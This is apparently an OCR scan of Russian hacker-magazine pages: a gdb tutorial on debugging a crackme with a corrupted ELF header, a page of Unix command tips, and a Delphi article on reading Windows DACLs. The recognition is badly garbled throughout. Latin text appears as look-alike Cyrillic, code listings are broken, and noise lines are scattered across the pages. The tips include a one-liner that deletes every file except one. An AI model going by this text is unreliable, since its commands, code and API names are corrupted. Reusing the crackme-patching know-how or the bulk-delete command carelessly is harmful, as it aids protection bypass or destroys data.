органов управления дбЬ сравним разве что 
с истребителем, и прежде, чем эта махина 
тронется с места, приходится прошерстить 
сотни страниц документации, отказаться от 
всех прежних привычек и понятий, вывер- 



нуть сознание наизнанку и сойти с ума. Зато 
потом зой-ісе покажется жалкой поделкой, 
на которую невозможно смотреть без содро- 
гания. 

Эта статья — не пересказ документации по 
дсІЬ, не руководство по командам и не струк- 
турированное описание основных возмож- 
ностей дсІЬ, адаптированное под хакерские 
цели. Я буду забегать вперед, пускаться в 
длинные отступления, ходить кругами и воз- 
вращаться обратно, но... по-другому гово- 
рить о дсІЬ просто не получается. 

Все графические приблуды (типа Эаіа Эізріау 
ЭеЬиддег) идут в топку, поскольку дискреди- 
тируют философию интерактивной отлад- 
ки и превращают дсІЬ в некоторое подобие 
морской свинки, к тому же дсІЬ имеет свою 
собственную встроенную «морду» (СЮВ 
Тех! Ызег ІпіеіТасе), вызываемую ключом '- 
Іиі' командной строки и ориентированную 



преимущественно на отладку приложений 
с исходными текстами. Правда, для хакеров 
она практически бесполезна. 

О Подготовка к отладке 

Загрузка исполняемых файлов в отладчик 
обычно осуществляется заданием их имени 
(при необходимости — с путем) в командной 
строке. При этом полезно указывать ключ 
'-цше!' (или сокращенно '-ц') для подавления 
надоедливого копирайта. 

|# дсі'Ь - ЩЙШШШШШ. 

Для передачи программе аргументов исполь- 
зуй ключ ' — агдз', за которым следует имя от- 
лаживаемого файла с его аргументами (об- 
работка ключей дсІЬ при этом прекращается, 
поэтому '--агдз' должен стоять последним в 
строке). 
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ПОГРУЖЕНИЕ В ТЕХНИКУ И ФИЛОСОФИЮ 6ЮВ 

МІД-1*Ы*>— ><■ іИнГ- 



«йИ>1К;‘ — ^«ІЩбчТё 

> [собственная интерактивная 
«морда» отладчика дсІЬ] 



> Официальный сайт отладчика дсІЬ 



штт -агдз дсІЬ-сІето агді агд2...агдЫ 

При желании отлаживаемый файл можно 
загрузить непосредственно из отладчика ко- 
мандой «іііе»: 

# дсіь Щ 

(дсІЬ) ЛІе дсІЬ-сІето 

Неасііпд зутЬоІз {гот дсІЬ-сІето... сіопе 

Внимание! В отличие от зоЙ-ісе/іигЬо- 
ЬеЬиддег/оІІусІЬд и прочих ѵѵіпсіоѵѵз-отладчи- 
ков в дсІЬ программа после загрузки еще не 
готова к работе. Она не имеет регистрового 
контекста, и поэтому команды трассировки 
нам недоступны, однако мы можем устанавли- 
вать точки останова внутри программы (не на 
библиотечные функции), просматривать/мо- 
дифицировать память, дизассемблировать 
кодит.д. 

Обычно первым (разумным) действием после 
загрузки является установка брейкпоинта 
на функцию таіп (главную функцию языка 
Си) или _зіагі — точку входа в программу, что 
осуществляется командой «!Ь адрес/имя», 
устанавливающей «одноразовую» точку ос- 
танова, после чего можно смело запускать 
программу командой «гип» (или «г»), зная, что 
отладчик «всплывет» в заданном месте. 

# дсІЬ %ІЙЙ^аШйШ 

(дсІЬ)ІЬ таіп 

Вгеакроіпіі аі 0x8048473 

шш 

О Загрузка исполняемых файлов 
без символьной информации 

Если символьная информация отсутствует 
(например, была отрезана утилитой зігір, как 
очень часто и бывает), то установка точек ос- 
танова на_зіагі/таіп невозможна, и мы долж- 



ны указать отладчику «физический» адрес 
точки входа, который можно получить, напри- 
мер, при помощи утилиты оЬісІитр, запущен- 
ной с ключом '-Г: 

# зігір дсІЬ-сІето 
йгітвДІИДЦІіІаыиШІ 

дсІЬ-сІето: О : І386, ЕХЕС_Р, НАЗ_ЗѴМЗ, 0_РА0Е0 
архитектура: І386, флаги 0x00000112: 

ЕХЕС_Р, НА5_5ѴМЗ, 0_РАѲЕО 
Н&аЛьЯ ёій4дЬФсШ0 вШ :83Щ 

Здесь установка точки останова на таіп 
проваливается, так как символьной ин- 
формации нет. Отладчик предлагает уста- 
новить ее позднее, но мы от этой идеи отка- 
зываемся, поскольку такой символ никогда 
не станет доступен. 

# дсІЬ -я дсІЬ-сІето 

(по сІеЬиддіпд зутЬоІз ІоипсІ)... 

ИсІЫ ьНІІп 

Рипсііоп "таіп" поісіейпесі. 

іИЙІаіІІ 

А вот установка брейкпоинта по непосредс- 
твенному адресу проходит успешно: 

мм циннии 

(дсІЬ) г 

Зіагіілд ргодгат: /Гіоте/крпс/дсІЬ/дсІЬ-сІето 
(по сІеЬиддіпд зутЬоІз {оипф... 

О Подключение к уже запущенно- 
му процессу 

Если процесс, который необходимо отла- 
живать, уже запущен, к нему можно подклю- 
читься, указав его идентификатор вместе 
с ключом '-рісГ в командной строке, либо 
воспользовавшись командой «аИасЬ иден- 



тификатор» непосредственно из самого 
отладчика. Отсоединиться от процесса 
можно либо командой «сІеіасЬ» (запущен- 
ной без аргументов) или же выходом из от- 
ладчика по команде «циі!» (или «ц»), После 
отсоединения процесс продолжает свою 
работу в нормальном режиме, а если его 
необходимо завершить, то на помощь при- 
ходит команда «кіІІ», убивающая текущий 
отлаживаемый процесс. Далее приведу 
пример сеанса работы. 

Запрашиваем РЮ подопытной программы: 

УУвШІшІ^Д р аЬъ*ГаШ& 

РЮ ТТУ ТІМЕ СІѴЮ 

8189 рІз/7 00:00:00 дЬЬЩетО 

Подключаемся к уже запущенному процессу 
через командную строку: 

шть -ц -ріо 

ВеаЬіпд зутЬоІз {гот /Ьоте/крпс/дЬЬ/дЬЬ_Ьето... 

ММ 

. .сіШе .1 

Неасііпд зутЬоІз {гот /ІІЬ/ІсІ-Ііпих.зо.2.. .сіопе. 
0х400{2аЬ8 іп геасі () {гот /ІІЬ/ІІЬс.зо.6 

шя 

Вот так можно подключиться к уже запущен- 
ному процессу командой «айасЬ»: 

#даь-і 

(дсІЬ) айасЬ8189 
АйарЬіпд {рргосѳзз 81 89 

МН 

О Загрузка программ с потрепанны- 
ми заголовками 

Если заголовок еІІ-файла умышленно иска- 
жен (смотри статью «Капитуляция защитных 
механизмов», опубликованную в январском 
«Хакере» за 2006 год), то дсІЬ наотрез отка- 
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№*шв && і < і+іепд^Ь? і++У { 

&& Ё . оісншпьз Іі] . ѵаіие I* им ) { 





жется его загружать. Пример такого файла 
можно найти на ѵѵѵѵѵѵ.сгасктез.сіе/изегз/ 
ѵапізіо/ііпѵ сгаскте/ . 

Выход: циклим еіі в точке входа, запускаем и 
подключаемся к процессу командой «аііасб» 
(или «дсІЬ-рісІ идентификатор»), а после по- 
падания в отладчик восстанавливаем ориги- 
нальные байты и приступаем к трассировке в 
обычном режиме. Покажем, как это осущест- 
вить на практике. 

Загружаем ііпу-сгаскте в любой бех-редак- 
тор (например, в іііе или Меѵѵ), переходим 
в точку входа (в Ыеѵѵ'е это осуществляется 
нажатием <ЕМТЕВ> (для перехода в Нех-ре- 
жим), <Р8> [Неабег], <Р5> [епігу]). Запоми- 
наем (записываем на бумажку) содержимое 
двух байт под курсором (в нашем случае они 
равны ВЗіі 2Аіі) и заменяем их на ЕВіі РЕИ, 
что соответствует инструкции «фтрз $». 
Сохраняем изменения, запускаем файл, оп- 
ределяем его ріб, подключаем к процессу от- 
ладчик. Ріа этот раз дбЬ хоть и ругается на не- 
верный формат, но все-таки подключается к 
процессу, предоставляя нам полную свободу 
действий. Ріо прежде, чем начать трассиров- 
ку, необходимо расциклить файл, вернув пару 
байт из точки входа на место. 

Модификация памяти (регистров и пере- 
менных) осуществляется командой «зеі». 
Для примера запускаем зацикленный ііпу- 
сгаскте: 

# ./ііпу-сгаскте 

Переходим на соседнюю консоль и выпол- 
няем команду для определения уникального 
идентификатора процесса: 

-а I дгер Ііпу-сгаскте 

РЮ ТТУ ТІМЕ СІѴЮ 

іія^ннвиі^нв® МЯНВИВВЯІ 

Отладчик ругается на неверный формат фай- 
ла, но все-таки позволяет присоединиться к 
требуемому процессу: 

# 9«іь -I 

(дбЬ) аііасИ 13414 
АііасИ іпд іо ргосезз 13414 

"/Гіоте/крпс/дсІЬ/ііпу-сгаскте": поі іп ехесиіаЫе іогтаі: 
Теперь нам под силу восстановить оригиналь- 



ные байты командой «зеі»: 

(дбЬ) зеі *(ипзідпесІ сИаг*)$рс = ОхВЗ 

Здесь «$рс» (с учетом регистра!) — услов- 
ное обозначение регистра-счетчика команд 
(ргодгат соипі), а «*(ипзідпеб сНіаг*)» — явное 
преобразование типа, без которого дбЬ ни за 
что не сможет определить размер записыва- 
емой ячейки. Это довольно длинная конструк- 
ция, и у нас возникает естественное желание 
ее сократить. 

Отладчик помнит историю команд, и, чтобы 
не вводить уже введенную команду, доста- 
точно нажать «стрелку вверх» и отредакти- 
ровать строку. В нашем случае — заменить 
«$рс = ОхВЗ» на «($рс+1) = 0х2А». Уже коро- 
че, но все равно недостаточно. Примечание: 
по умолчанию дбЬ не сохраняет историю 
команд, и она действительна только в преде- 
лах одного сеанса. Чтобы задействовать ав- 
томатическое сохранение, следует набрать 
«зеі Нізіогу заѵе оп» и при необходимости за- 
нести эту последовательность в -/.дбЫпіі. 

И вот тут мы подходим к одному из главных 
преимуществ дбЬ над зоіі-ісе. Отладчик дбЬ 
неограниченно расширяемый и поддержива- 
емый продвинутый интерпретатор, позволя- 
ющий объявлять свои переменные, начинаю- 
щиеся со знака «$», с которыми можно делать 
все, что душе угодно. 

Улучшенный вариант восстановления ячеек 
памяти с использованием переменной $і вы- 
глядит так: 

(дсІЬ)зеі$і = $рс 

И№ I зеі *(ипзідпесІ сИаг*)$і++ = ОхВЗ 
И® зеі *(ипзідпесІ сИаг*)$і++ = 0х2А 

Здесь после ввода «зеі *(ипзідпеб сНаг*)$і++ 
= ОхВЗ» мы нажимаем «стрелку вверх» и все- 
го лишь меняем ОхВЗ на 0х2А (переменная $і 
увеличивается сама), что намного короче, но 
все равно длинно и нудно. 

А теперь с помощью «беііпе» объявим свою 
собственную команду бб, которая будет запи- 
сывать байт по указанному адресу: 

ШШШМШЙШШШ 

іуре соттапсі іог сіеііпіііоп оі "бсі". 

^ИИВВ^^ІВІВВІПІ 

в 



Обрати внимание, как дбЬ изменил тип при- 
глашения («>»), когда началось определе- 
ние команды! Закончив с вводом, мы гово- 
рим «епб» — и новая команда добавляется 
в память дбЬ наряду со всеми остальными. 
Она принимает два аргумента $агдО (адрес) 
и$агд1 (записываемый байт). 

Теперь для восстановления байтвточке вхо- 
да достаточно дать следующую последова- 
тельность команд: 

(дсІЬ) зеі $і = $рс 

ИіЯіішадші 

Внимание! Если написать «бб $рс++ ОхВЗ», 
то после выполнения команды регистр $рс 
увеличится на единицу, что никак не входит в 
наши планы! 

Пользовательские команды существуют 
только на протяжении текущего сеанса, по- 
гибая при выходе из дбЬ, что очень плохо, 
однако мы можем загнать их в командный 
файл, к примеру, в п2к_стб: 

■шниніів 

беііпеЩ 

|зеі*(ипзідпеб сНаг*)$агдО = $агд1; 

Ш 

Загрузка подобного файла в память осущест- 
вляется командой «зоигсе имя_файла» (в 
нашем случае: «зоигсе п2к_стб»), причем, 
поскольку дбЬ поддерживает автодополне- 
ние ввода, свойственное практически всем 
командным интерпретаторам, совершенно не 
обязательно выписывать «зоигсе» целиком. 
Достаточно набрать «зо» и нажать <ТАВ>. От- 
ладчик самостоятельно допишет остальное. 
Если существует несколько команд, начина- 
ющихся с «зо», то вместо автозавершения 
раздастся мерзкий писк, сигнализирующий 
о неоднозначности. Повторное нажатие 
<ТАВ>'а приводит к выводу всех возможных 
вариантов. 

Создавая свои собственные команды, за- 
гружаемые из -/.дбЬіпіі или вручную, мы не 
только обеспечиваем комфортную работу, 
но и увеличиваем производительность труда! 
Те, кто обвиняет дбЬ в неудобстве, просто не 
умеют затачивать его под себя, но мы умеем! 
Кстати, сейчас как раз настало время, чтобы 
что-нибудь заточить. 
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> Родная стихия профессионалов > Просмотр используемых версий дсІЬ и дсс 



□ Прежде чем начинать трассировку 

В отличие от зой-ісе (и даже сІеЬиа.сот !) 
дсІЬ не показывает мнемоники машинных инс- 
трукций при трассировке, если его об этом 
не просят, что сильно смущает новичков, но 
идеологически так правильнее. Отобразить 
машинную команду по заданному адресу 
можно с помощью команды «х/і адрес», на- 
пример: 

Вместо адреса можно использовать любое 
другое выражение, переменную или регистр 
(если регистры доступны), однако отлаживать 
программу в таком режиме крайне неудобно 
и лучше задействовать режим автоматичес- 
кого отображения, определяемый командой 
«сіізріау». 

Режим автоматического отображения поз- 
воляет выводить значение любого выраже- 
ния, регистра, ячейки памяти, машинной 
инструкции при каждой остановке дсІЬ (на- 
пример, при пошаговом выполнении). Ко- 
манда «бізріау/і $рс», которую достаточно 
дать один раз за весь сеанс, будет отображать 
одну машинную инструкцию под $рс за раз, но 
это не очень удобно, и на практике постоянно 
возникает необходимость узнать, какая же 
инструкция следует за выполняемой. Я обыч- 
но вывожу по три инструкции за раз и вполне 
этим доволен: 



пиши 



0x200008: 


тоѵ 


$0х2а,%Ы 


0x20000а: 


І т Р 


0x200040 




0x200001: 


асісі 


%аІ,(%есІх) 



ИЯИ— 

шшшшви штм 

Для автоматического отображения зна- 
чения регистров достаточно дать команду 
«сіізріау регистр», где регистр — $еах, $еЬх, 
$есх и т.д. Для регистра-указателя текущего 
положения стека существует специальное 
имя — $зр, которое можно использовать 
наравне с $езр (точно так же, как $рс <-> 



$еір). Автоматических отображений может 
быть создано сколько угодно, и любое из 
них всегда может быть удалено командой 
«ипсіізріау пі п2 .. пп», где пх — номер отоб- 
ражения, который можно узнать по команде 
«іпТо сіізріау». Временно выключить отобра- 
жение помогает команда «сІізаЫе сіізріау пі п 
2 ... пп», а «епаЫе сіізріау» включает обратно. 



О Переключение режима дизассем- 
блирования 

По умолчанию дсІЬ использует синтаксис 
АТ&Т, но может выводить инструкции и в фор- 
мате ІпіеІ. Для этого достаточно дать команду 
«зеі сІізаззеппЫу-Паѵог іпіеі», а чтобы вернуть- 
ся назад — «зе{ сІізаззетЫу-'Паѵог аіі». Для на- 
глядности сравним с предыдущим листингом. 



ЖФІ зеі сІізаззетЫу-ІІаѵог іпіеі 
(дсІЬ) сІізрІау/ЗІ $рс 




ВШІ 

В УТЕ РТР [есІх],аІ 



|дсІЬ)п( 

0х0020000аіп??() 



О Перенаправление ввода/вывода 

По умолчанию дсІЬ связывает со стандартным 
вводом/выводом отлаживаемой программы 
текущую консоль, в результате чего сооб- 
щения программы перемешиваются с сооб- 
щениями отладчика. Чтобы навести порядок, 
необходимо перенаправить ввод/вывод про- 
граммы на отдельную консоль, что осущест- 
вляется командой «ііу консоль». Открываем 
новую консоль, даем *піх-команду «\1у» для 
определения ее имени (получаем, например, 
«/беѵ/рз/6»), возвращаемся к консоли отлад- 
чика и говорим: 



О Вывод выражения на экран 

Для вывода выражений используется коман- 
да «ргіпі» (псевдоним «р»). Продемонстриру- 
ем некоторые ее возможности: 



■■ 



ИМЕН! 

$1=4 

■■вв 

11=1 

# вывод значения Я 

ШІЖВ1 

$3 = (ѵоісі *) ОхЬШМ 

# вывод ячейки, на которую указывает $зр в Гіех'е 

ши 



# вывод ячейки, на которую указывает $зр в ипзідпесі 
|§с-формат| 

(дсІЬ) р/и *(ипзідпесІ іпі*) $зр 



чанию) 

(дсІЬ)р*0хЬШВЗР 
$6 = 25Д 



шшшжш тті 

ШѳШ 

Как видно, при каждом выводе значения 
«ргіпі» создает переменную, которую затем 
с успехом можно использовать в последую- 
щих выражениях. Также доступна функция 
«ргіпІЬ со стандартным набором специфи- 
каторов, она особенно удобна в командных 
файлах. Например, следующая запись вы- 
водит значение сразу трех регистров (обра- 
ти внимание на отсутствие круглых скобок 
вокруг нее!): 

(дсІЬ) ргіпіі "%х %х %х\п",$еах,$еЬх,$еЬх 



□ Заключение 

Мы успешно загрузили исполняемый файл 
внутрь дсІЬ, вплотную приблизившись к 
трассировке. В следующей статье пока- 
жем, как работать с машинным кодом, уста- 
навливать точки останова, изменять поток 
выполнения программы и делать много дру- 
гих удивительных вещей. Потенциал дсІЬ 
только начинает раскрываться... зс 
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^ ипіхіогі 




ЕВГЕНИЙ ЗОБНИН АКА Л М 

/ Л М@Ы5Т.ПІІ / 




Полезные мелочи 

Извлечение ѴісІео-РОМ: 

I# сісі Іі=/с1еѵ/тет оЩѵдаЬіоз. Ьіп зкір= 1 536 соипі= 1 28 



Быстро распечатать содержимое терминалки 
гхѵі: 

|СігІ-РгіпіЗсгееп или ЗЬіИ-РгіпіЗсгееп 
Іресурс: ргіпі-ріре: ІргД 



Включить/выключить сірплз: 

сІртзАсІртз 

Не открывать порт для прослушивания: 

-поіізіеп; 

Включение/выключение расширений: 

+ехіепзіоп пате/-ехіепзіоп пате 



-ЬепсЬтагк 

Начать с определенной позиции: 
-зз01:Ю:оЖ 



Использовать качественный кодек МАО для 
декодирования звука: 

#ес5о "ас=тасІ," » -/тріауег. сопГд 




Выделение пути двойным кликом в гхѵі, где 
присутствует символ тильды (~): 

РхѵЦсиісІпагз: "''&()*, ?@[]{ІІН 

Удаление всех файлов, кроме одного: 

# ГіпсІ -іуре 1 ! -пате 'Мех' -сіеіеіе 

Вот так можно проверить, кто занимает конк- 
ретный порт: 

І#ізоН іТСР:660оД 

Показать удаленные, но открытые файлы: 
#ІзоМІ_1 



Утилита ІзоТ понимает отрицания и регуляр- 
ные выражения: 

# ІзоНсѴрозі.*ег/'| 

#І зо^ -і -и л гоо ! 

Чтобы завершить работу программы, работа- 
ющей с каталогом /орі, выполняем: 

рМкіІПзоМ/орГ 



Регулировка громкости динамика при работе 
в консоли и иксах: 



зейегт -ЫепдіЬ О 
хзеі Ь оТС 



ѵіт 

Одновременное прокручивание нескольких 
окон в текстовом редакторе ѵіт: 

:зеі зсгоІІЬІпсІ 



Подключиться к другому хосту: 



Послать широковещательное сообщение: 

-Ьгоасісазі 



Посмотреть фильм в негативном отображе- 
нии: 

# тріауег -ѵі ец2=1 ,0:-0.8 тоѵіе.аѵі 

тепсосіег 

Кодирование в два прохода: 



Использовать альтернативный конфиг: 
ІфопТіфіІеД 



Установка картинки на рабочий стол: 

^сіізріау-гезіге 1024x768! -ѵѵіпсіоѵѵ гооіѵѵаіірарег.ірд 

28 И 

Удобный пошаговый мастер по настройке ко- 
мандного интерпретатора 2 зИ: 

# аиіоіоасі -1)г гзіп-пеѵѵизег-іпзіаіі 
|# гзіп-пеѵѵизег-іпзіаіі -і 



# тепсосіег -сіѵсі 2 -оѵс Іаѵс -Іаѵсоріз ѵсосІес=тр^ 
I И^аззЩ^ас'сору ^Т поѵі е . а^И 
#г 



^ тепсосіег -сіѵсі 2 -оѵ с Іаѵс -Іаѵсоріз ѵсосІес=тр<| 
|ѵразз= 2 -оас сору -о тоѵіе.аѵі 

Установка битрейта (по дефолту 800): 

-оѵс Іаѵс -Іаѵсоріз ѵЬіігаіе= 1 800 



Опции, улучшающие качество (за счет скоро- 
сти): 

.{-оѵс Іаѵс -Іаѵсоріз ѵ4тѵ:ігеІІ:кеуіпі=150:тЬсІ=2:сЬр: 
тѵ0:ргете=2:тред_диапі 



тріауег 

ОѴО-устройство (по умолчанию используется Перемасштабирование: 



/беѵ/сіѵб): 

|-сІѵсІ-сІеѵ ісе /сІеѵ/бсІсІИ 

Покадровый просмотр: 
клавиша"." 



Переключение ОѴО-фильмов: 

СѵціТПоИ 



клавиши < , > 



-ѵ! зсаІе=ѵѵісІ1:Гі: ГіеідИІ: 

Обрезание краев: 

-ѵ1хгор=ѵѵ:Іп:х:у 

Исправление АѴІ-файлов с испорченными 
заголовками: 

# тепсосіег -ісіх іприі.аѵі -оѵс сору -оас сору -о оиіриі.р, 
аѵі 



Формирование испорченного заголовка: 

ПсІхИ 



Кодирование только звука: 
-оѵс ^гагпепо 



X ѴѴіпсІоѵѵ 

Ускорение мыши: 

|-аН 



Поменять аспект(4:3, 16:9, 2,35:1): 
-азресіХ:Ѵ 

Показывать различную статистику: 



Вырезание звука: 

-ао рстТіІеМтр.ѵѵаѵ 

-ао рст -аоТМе ітр.ѵѵаѵ (для < 1 ,0рге7) 
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Касса, 
машинист, 
дежурный 
по эскалатору - 
справок не дают, 
все вопросы 
к Яндексу. 



ѵѵѵѵѵѵ.уапсіех.ги 





' Железобетонные 
объекты: ОАСІ- 




КОВЫРЯЕМ ПРАВА ДОСТУПА К ОБЪЕКТАМ 



) 







I 





♦ ПРОДОЛЖАЕМ ЗНАКОМИТЬСЯ С ФУНКЦИЯМИ ОПРЕДЕЛЕНИЯ ПРАВ ДОСТУПА К ОБЪЕКТАМ. СЕГОДНЯ НАМ ПРЕДСТОИТ 
НАУЧИТЬСЯ ОПРЕДЕЛЯТЬ, КОМУ И КАКИЕ ПРАВА ДОСТУПНЫ В ОТНОШЕНИИ ОПРЕДЕЛЕННОГО ОБЪЕКТА. ТЕМА БУДЕТ ИН- 
ТЕРЕСНА НЕ ТОЛЬКО ПРОГРАММИСТАМ, ПОТОМУ ЧТО, ПРОЧИТАВ СТАТЬЮ, ТЫ ЛУЧШЕ ПОЙМЕШЬ, КАК ѴѴІІХЮОѴѴЗ ХРАНИТ 
СПИСКИ ДОСТУПА К ОБЪЕКТАМ И КАК ОНИ ОРГАНИЗОВАНЫ. ТУТ ПРОГРАММИСТАМ НА ОЕЬРНІ НЕ ОЧЕНЬ ПОВЕЗЛО, ТАК 
КАК В ЗАГОЛОВОЧНЫХ ФАЙЛАХ ОПИСАНО НЕ ВСЕ, И КОЕ-ЧТО НАМ ПРИДЕТСЯ ОПИСЫВАТЬ САМОСТОЯТЕЛЬНО. НО ОБО 
ВСЕМ ПО ПОРЯДКУ. 

II; > 11 > I І Г ‘ИЯ Т , И* I? 1 - Л Т І Ш 




* ? 




рава доступа на объекты ОС хра- 
нятся в списке ОАСІ_. Данный 
список можно получить к любому 
объекту, который защищен ОС, а в ѴѴіпбоѵѵз 
не защищены разве что только элементы уп- 
равления в окнах. Сами окна, сервисы, про- 
граммы и тем более файлы имеют ОАСІ_, и по 
его содержимому можно определить, кто и что 
может делать с объектом. 

Пока не будем заострять внимание на том, что 
представляет собой этот список (скоро все 
встанет на свои места). Давай пока научимся 
получать сам ОАСІ_. Для этого используется 
функция ОеІЫатесІЗесигііуІпГэ. В общем виде 
она выглядит следующим образом: 

Гіпсііоп ОеіЫатесІЗесигііуІпк)( 
рОЬіесіЫате: РАпзіСЬаг; 

ОЬіесіТуре: ЗЕ_ОВ^СТ_ТѴРЕ; 

Зесигііуіггіо: ЗЕСШІТУЗМЕОЯМАТІОЫ; 

ррзісІОѵѵпег, 

ррзісЮгоир: РР5Ю; 



ррйасі, 
ррЗасІ: РАСІ_; 

ѵаг ррЗесигііуОезсгіріог: РЗЕСІІВГПМЭЕЗСЯІРТОЯ 
): ОѴѴОРО; 

Рассмотрим параметры этой функции — тут 
есть, над чем пораскинуть мозгами: 
РОЬіесіЫате — имя объекта, список которого 
мы хотим получить. Если это файл, то необхо- 
димоуказать корректный путь, чтобы програм- 
ма смогла найти его. Если это имя сервиса или 
принтера, то имя должно выглядеть так: \\имя_ 
компьютера\имя_объекта, где имя_объекта 
— это имя сервиса или принтера. 

ОЬіес^Туре — определяет тип объекта. Здесь 
можно указать одну из следующих констант: 

• 5Е_РІІ_Е_0ВЗЕСТ — файл или директория; 

• 5Е_5ЕКѴІСЕ — сервис; 

• 5Е_РКІІЧТЕК — принтер; 

• ЗЕ_КЕСІ5ТКѴ_КЕѴ — ключ реестра; 

• ЗЕ_І_МЗНАРЕ — расшаренный ресурс; 

• 5Е_КЕРМЕ1__0ВЗЕСТ — объект ядра (процесс, 



поток, семафор, событие ...); 

• ЗЕ_УІГЮОУ_0ВЗЕСТ — окно или объект ра- 
бочего стола. 

Глядя на эти константы, становится ясно, что 
именно может защищать ѴѴіпбоѵѵз с помощью 
списков доступа. Г лавное, чтобы он делал это 
хорошо. 

Весип^уіпто — это комбинация флагов, по 
которой определяется, что именно мы хотим 
узнать. Здесь можно указать комбинацию из 
флагов: 

• 0УМЕК_5ЕСІІКІТѴ_ІІЧР0КМАТЮІЧ — иденти- 
фикатор владельца. Если указан этот флаг, 
то результат будет получен через переменную 
ррзісІОѵѵпег; 

• СР0иР_ЗЕСІ_ІКІТѴ_ІМР0КМАТІОІЧ — иденти- 
фикатор группы. Если указан этот флаг, то 
результат будет получен через переменную 
ррзісЮгоир; 

• 0АСІ_8ЕСІІРІТѴ_ІМРОКМАТІОМ — список 
ОАСІ_. Если указан этот флаг, то результат бу- 
дет получен через переменную ррЭасІ; 
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• 5АСІ_5ЕСиРІТѴ_ІМГ0РМАТІ0М — список 
ЗАСІ_. Если указан этот флаг, то результат бу- 
дет получен через переменную ррЗасІ; 

• ррЗесигНуОезсгір^ог — в этом параметре 
возвращается дескриптор безопасности. 
Итак, чтобы получить ОАСІ_, мы должны напи- 
сать следующую строку кода: 

ѲеІЫатесІ5есигіІуІпІо( 

РСЬаг(ЕШ1.Техі),ЗЕ_РІІ_Е_ОВ^СТ, 
ОАСЩЗЕСШІТѴ^РОЯМАТЮІЧ піі, піі, 
РАСЦ@рОАСІ_), піі, рЗй) 

При этом переменные рЗО и рОАСІ_ должны 
быть объявлены следующим образом: 

рЗй : РЗЕСІІЯГПМЭЕЗСВІРТОН; 
рОАСЬ : РАСІ_; 



сІѵАсІІп^отпа^іопСІагг — класс необходи- 
мой информации. Нас интересует класс 
АсІЗігеІпіогтаііоп. 

Самое интересное — это второй параметр, 
через который мы получаем необходимые 
данные. В функции он объявлен как простой 
указатель, но должен указывать на структу- 
рутипаАСІ__ЗІ2Е_ІІ\ІРОПМАТІОІ\І. Я не нашел 
ее описания в заголовочных файлах Оеірбі, 
поэтому благодаря файлу помощи пришел к 
выводу, что она должна выглядеть следую- 
щим образом: 

АСІ__ЗІ2Е_ІІ\ІРОРМАТІОІ\І = гесогсі 

АсеСоипі : ОѴѴОРО; 

АсІВуіезІпІІзе : йѴѴОРЮ; 

АсІВуіезРгее : ОѴѴОРЮ; 
епсі; 



Существует несколько типов этих записей, а 
в файле помощи перечислено всего четыре. 
Забегая вперед, скажу, что в действитель- 
ности их намного больше. Другое дело, что 
не все они поддерживаются, да и нужны нам 
только два типа: разрешение и запрещение 
(АССЕЗЗ_АІ_І_ОѴѴЕО_АСЕиАССЕЗЗ_ОЕІ\ІІЕО_ 
АСЕ). Но как они выглядят? 

Читаем файл помощи дальше и видим, что в 
начале структуры АСЕ идет структура АСЕ_ 
НЕАОЕР, после этого количество и типы па- 
раметров зависят от типа АСЕ. Структуры 
АСЕ_НЕАОЕВ в заголовочных файлах я также 
не нашел, но благодаря Неір-файлу можно оп- 
ределить, что в ОеІрИі она должна выглядеть 
примерно так: 

_АСЕ_НЕАОЕВ = гесогсі 



л* 









АсеТуре : ВУТЕ; 


* *: 


( к шГ” 
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О Получение информации 


Итак, получить информацию можно, выполнив 


АсеРІадз : ВУТЕ; 


, I 


Ш шЖ 


Структуру типа АСІ_ мы получили, но это 


следующую строку: 


АсеЗіге : ѴѴОРЮ; 





еще не сама информация. Сам список до- 
ступа можно получить с помощью функции 
ѲеІАсІІпІогтаІіоп, которая описана следую- 
щим образом: 

Нпсііоп ОеіАсІІп!огтаііоп( 
сопзі рАсІ: ТАСЬ; 
рАсІІгЧогтаііоп: Роіпіег; 
пАсІІпЬгтаІіопЬепдІГі: ОѴѴОРЮ; 
ЦѵѵАсІІгЧогтаІіопСІазз: ТасІІпІогтаІіопСІазз 
): ВООІ_; зісісаіі; 

Посмотрим на параметры этой функции: 
рАсІ — указатель на структуру типа ТАСІ_, 
которую мы получили при вызове функции 
СеіІХІатесІЗесипіуІпІю; 

рАсІІпРогта^іоп — указатель, по которому мы 
получим результирующую информацию; 
пАс1Іп^огта*іопІ_епд*И — размер параметра, 
указанного в рАсІІпіогтаііоп; 



ОеіАсІІпЬгтаііоп(рОАСІ_ л , @асІІпТо, 
зі 2 еОі(асІІпІо), АсІЗігеІНогтаІіоп) 

Первую переменную мыуже объявили, аасііпіо 
нужно объявить как: 

асііпіо : АСІ__5І2Е_ІІ\ІРОЯМАТІОІЧ 

О Просматриваем список ОАСІ. 

У нас есть список, и теперь осталось только 
его просмотреть и определить права доступа. 
И тут у дельфинистов начинаются проблемы. 
Список ОАСІ_ состоит из набора структур АСЕ 
и идентификаторов ЗЮ. Проблема в том, что 
структура АСЕ в Оеірбі нигде не описана. Если 
обратиться к файлу помощи по ѴѴіпбоѵѵз АРІ, 
то тут описания этой структуры нет. Зато напи- 
сано, что АСЕ — это запись в списке контроля 
доступа. 



епсі; 

Понятно, что назвать ее можно как угодно, 
главное, чтобы количество и типы параметров 
были именно такими. 

Первый параметр структуры — это тип запи- 
си. Типов — великое множество, и ихописание 
можно найти в МЗОІЧ, но большинство из них 
не поддерживается, а нас будет интересовать 
только АССЕЗЗ_АІ_І_ОѴѴЕО_АСЕ и АССЕЗЗ_ 
О Е N I Е 0_АС Е_Т V Р Е . 

О Загадочный АСЕ 

С заголовком определились, но что же бу- 
дет идти после заголовка в записи АСЕ? 
Опять приходится обращаться к МЗОЫ, 
где мы узнаем, что для записей разре- 
шения и запрещения доступа после заго- 
ловка идет два значения: маска доступа 
типа АССЕЗЗ_МАЗК и число типа ОѴѴОРО, 
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5уПиг-і1мт АСЁі ні гк* ифрогіісі ш Им сштиЦ юк»л лГШпфям Ш 
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Йнпнкі 

Ал АС1 свпі-нлз ш ЬѵС аГАСЕс. Ал АСЕ гівЬѵн- испяя Іо іп м,«1 Гві -в гркіі: ч %€ і сг дтаир <я Иѵйлвз Им Іурм- ві всевая Йій 
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ЦЧЪЛъЛ ні Ы» ІВДйР 
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лгпіая. вшіоидаі ыо, Аса аишЕимх, ш, м_* дмциз, ш нитіиа 







идентификатор ЗЮ пользователя или 
группы, в отношении которого это разре- 
шение действует. 

Так как разрешающая и запрещающая за- 
писи АСЕ выглядят одинаково, то мы можем 
объявить одну структуру следующего вида: 

АССЕ85_АСЕ = гесогсі 
Неасіег : _АСЕ_НЕАЭЕР; 

Мазк : АССЕЗЗ_МАЗК; 

